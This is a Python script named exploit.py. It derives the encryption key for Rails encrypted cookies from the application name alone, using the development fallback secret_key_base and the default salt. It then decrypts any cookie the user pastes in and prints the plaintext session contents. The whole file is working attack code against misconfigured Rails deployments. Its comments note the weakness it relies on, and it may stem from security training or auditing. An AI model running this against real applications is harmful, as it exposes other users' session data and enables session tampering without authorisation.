exploit.py
#!/usr/bin/python3
import sys, hashlib, binascii, base64
from backports.pbkdf2 import pbkdf2_hmac
from Crypto.Cipher import AES
def decrypt_gcm(key, data, iv, tag):
    """Decrypt and authenticate an AES-GCM message given as hex strings.

    Args:
        key: Hex-encoded AES key.
        data: Hex-encoded ciphertext.
        iv: Hex-encoded value passed to the cipher as its third positional
            argument (the GCM nonce).
        tag: Hex-encoded authentication tag.

    Returns:
        The decrypted plaintext decoded as UTF-8.

    Raises:
        ValueError: from ``decrypt_and_verify`` when the tag does not match,
            i.e. the key is wrong or the message was modified.
        binascii.Error: if any argument is not valid hex.
    """
    raw_key = binascii.unhexlify(key)
    nonce = binascii.unhexlify(iv)
    cipher = AES.new(raw_key, AES.MODE_GCM, nonce)

    ciphertext = binascii.unhexlify(data)
    expected_tag = binascii.unhexlify(tag)
    # The tag is checked as part of this call, so no plaintext is
    # returned for a message that fails authentication.
    plaintext = cipher.decrypt_and_verify(ciphertext, expected_tag)
    return plaintext.decode("utf-8")
# Key derivation shown below uses no secret input: MD5 of
# "<APPLICATION_NAME>::Application", stretched with PBKDF2-HMAC-SHA1
# (1000 iterations, 32-byte output) under a fixed salt string. Anyone who
# knows the application name can therefore recompute the same key.
# NOTE(review): this looks like the fallback secret_key_base that Rails
# generates in development/test plus its default encrypted-cookie salt --
# confirm. A deployment that sets a random, private secret_key_base does not
# produce a key that can be derived this way.


def _b64_segment_to_hex(segment):
    """Return the hex form of one base64-encoded cookie segment."""
    return base64.b64decode(segment).hex()


if len(sys.argv) >= 2:
    app_name = sys.argv[1]
    print("[x] App name: ", app_name)

    md5_name = hashlib.md5(f"{app_name}::Application".encode()).hexdigest()
    salt = "authenticated encrypted cookie".encode("utf-8")
    key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), salt, 1000, 32)
    token = binascii.hexlify(key).decode("utf-8")
    print("[x] Key: ", token)

    # Expected input layout: three base64 segments joined by "--",
    # in the order ciphertext, IV, authentication tag.
    base64_data = input("Base64 Data: ")
    segments = base64_data.split("--")
    data = _b64_segment_to_hex(segments[0])
    iv = _b64_segment_to_hex(segments[1])
    tag = _b64_segment_to_hex(segments[2])

    rule = "-------------------------"
    print(
        f"{rule}\n"
        f" -> [x] Data: {data}\n"
        f" -> [x] IV: {iv}\n"
        f" -> [x] Auth Tag: {tag}\n"
        f"{rule}"
    )
    print("[x] Plaintext Data:", decrypt_gcm(token, data, iv, tag))
else:
    print("Usage: python3 exploit.py [APPLICATION_NAME]")